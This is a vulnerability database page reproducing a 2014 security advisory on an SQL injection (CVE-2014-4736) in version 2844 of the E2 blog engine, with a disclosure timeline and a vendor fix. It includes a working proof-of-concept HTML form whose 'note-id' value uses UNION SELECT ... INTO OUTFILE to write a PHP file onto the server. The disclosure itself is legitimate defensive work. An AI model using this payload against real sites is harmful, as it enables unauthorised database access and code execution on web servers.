Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHigh-Tech Bridge1337DAY-ID-22468
HistoryJul 24, 2014 - 12:00 a.m.

E2 2844 SQL Injection Vulnerability

2014-07-2400:00:00
High-Tech Bridge
0day.today
26

0.001 Low

EPSS

Percentile

34.9%

JSON

E2 version 2844 suffers from a remote SQL injection vulnerability.

Product: ะ•2 
Vendor: Ilya Birman
Vulnerable Version(s): v2844 and probably prior
Tested Version: v2844
Advisory Publication:  July 2, 2014  [without technical details]
Vendor Notification: July 2, 2014 
Vendor Patch: July 3, 2014 
Public Disclosure: July 23, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-4736
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ะ•2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application.


1) SQL Injection in ะ•2: CVE-2014-4736

The vlnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request, inject and execute arbitrary SQL commands in applicationโ€™s database. Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in database and gain complete access to the web site.

PoC code below will create a PHP file "/var/www/file.php", containing "phpinfo()" call (if the filesystem permissions and MySQL configuration allow it):


<form action="http://[host]/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="[emailย protected]">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Update to ะ•2 version v2845

More Information:
http://blogengine.ru/download/

#  0day.today [2018-04-09]  #

Related

htbridge 1
nvd 1
packetstorm 1
cvelist 1
cve 1
securityvulns 2
prion 1
htbridge
htbridge
SQL Injection in ะ•2
2014-07-02 00:00:00
nvd
nvd
CVE-2014-4736
2014-07-24 14:55:08
packetstorm
packetstorm
E2 2844 SQL Injection
2014-07-23 00:00:00
cvelist
cvelist
CVE-2014-4736
2014-07-24 14:00:00
cve
cve
CVE-2014-4736
2014-07-24 14:55:08
securityvulns
securityvulns
SQL Injection in ะ•2
2014-10-15 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-10-15 00:00:00
prion
prion
Sql injection
2014-07-24 14:55:00

0.001 Low

EPSS

Percentile

34.9%

JSON
Related for 1337DAY-ID-22468
htbridge1nvd1packetstorm1cvelist1cve1securityvulns2prion1